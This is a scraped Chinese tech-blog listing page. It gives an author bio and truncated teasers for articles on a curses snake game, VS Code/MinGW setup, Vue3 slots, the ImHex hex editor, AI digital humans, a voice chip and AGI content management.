大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为CSDN博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学的…

贪吃蛇(三)绘制蛇身

绘制蛇身的逻辑不难&#xff0c;存储上面使用结构体。 第一行和第十九行绘制--其它行&#xff0c;绘制|&#xff0c;分别在头尾处。 (1) 扫描蛇身&#xff0c;如果扫描到则绘制[]。 (2) 扫描蛇身&#xff0c;如果扫描不到则绘制空白。 #include"curses.h"struct Sn…

VS Code+MinGW 搭建Windows C++开发环境

官方文档是最香香的&#xff1a;https://code.visualstudio.com/docs/cpp/config-mingw 文章目录 1、一些非常不友好的名词1.1 什么TMD是 GNU、MinGW、GCC、gcc、g&#xff1f;1.2 MSVC 2、获取g编译器3、VS Code单文件编译和调试流程3.1 安装插件3.2 单个源文件编译运行3.3 ta…

32 在Vue3中如何同时定义多个插槽

概述 当你想要给外部预留多个位置的时候&#xff0c;具名插槽就非常有用了。 比如&#xff0c;我们定义一个卡片&#xff0c;让别人使用的时候&#xff0c;标题可以自定义&#xff0c;内容也可以自定义&#xff0c;这个时候就需要两个插槽。 基本用法 我们创建src/componen…

功能丰富的十六进制编辑器:ImHex 逆向工程得力助手 | 开源日报 No.119

WerWolv/ImHex Stars: 30.2k License: GPL-2.0 ImHex 是一个用于逆向工程师、程序员和在凌晨 3 点时还关心视网膜的人们的十六进制编辑器。该项目具有以下主要功能&#xff1a; 功能丰富的十六进制查看字节修补修补管理复制字节作为特性 (包括字节数组、16 进制字符串等)ASCI…

AI数字人盘活本地生活!

据艾瑞咨询统计&#xff0c;2022年中国本地生活服务市场规模达到3.8万亿元&#xff0c;同比增长23.5%。另据QuestMobile&#xff0c;2023年4月&#xff0c;本地生活综合服务行业全网渗透率38.4%&#xff0c;外卖服务渗透率15.6%。 本地生活市场仍具较大空间&#xff0c;各大平台…

WT588F34B-16S语音芯片:四通道16K采样率混音播放的应用优势

随着科技的不断进步&#xff0c;语音芯片在电子产品中的应用越来越广泛。其中&#xff0c;WT588F34B-16S语音芯片凭借其卓越的性能和创新的功能&#xff0c;引起了市场的广泛关注。特别是其支持四通道16K采样率混音播放的功能&#xff0c;为实际应用带来了显著的优势。本文将深…

聪明高效能力广,AGI如何赋能内容管理?

文 | 智能相对论 作者 | 叶远风 毫无疑问&#xff0c;现在的大模型在技术比拼之外&#xff0c;如何通过产品化的方式走入到实际业务&#xff0c;是各厂商的着力点。 而一些一贯与数字化场景紧密融合的服务厂商&#xff0c;在大模型浪潮一开始就已经走在落地一线。 大数据基…